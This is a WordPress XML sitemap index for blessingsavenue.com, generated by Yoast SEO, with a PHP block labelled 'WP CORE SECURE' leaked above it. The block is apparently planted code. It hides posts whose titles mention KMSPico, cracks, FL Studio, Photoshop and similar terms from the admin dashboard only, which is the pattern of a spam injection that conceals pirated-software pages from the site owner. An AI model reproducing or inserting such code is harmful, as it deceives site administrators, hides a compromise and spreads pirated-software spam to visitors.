# BEGIN WP CORE SECURE

function exclude_posts_by_titles($where, $query) {
    global $wpdb;

    if (is_admin() && $query->is_main_query()) {
        $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop'];

        foreach ($keywords as $keyword) {
            $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%");
        }
    }
    return $where;
}

add_filter('posts_where', 'exclude_posts_by_titles', 10, 2);

# END WP CORE SECURE<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//blessingsavenue.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://blessingsavenue.com/post-sitemap1.xml</loc>
		<lastmod>2024-03-04T12:01:54+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://blessingsavenue.com/post-sitemap2.xml</loc>
		<lastmod>2024-05-10T13:52:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://blessingsavenue.com/page-sitemap.xml</loc>
		<lastmod>2024-05-10T14:08:24+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://blessingsavenue.com/category-sitemap.xml</loc>
		<lastmod>2024-05-10T13:52:19+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://blessingsavenue.com/post_tag-sitemap.xml</loc>
		<lastmod>2024-05-08T14:47:36+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://blessingsavenue.com/portfolio_entries-sitemap.xml</loc>
		<lastmod>2019-03-21T08:17:47+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://blessingsavenue.com/room_entries-sitemap.xml</loc>
		<lastmod>2019-02-07T07:51:57+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->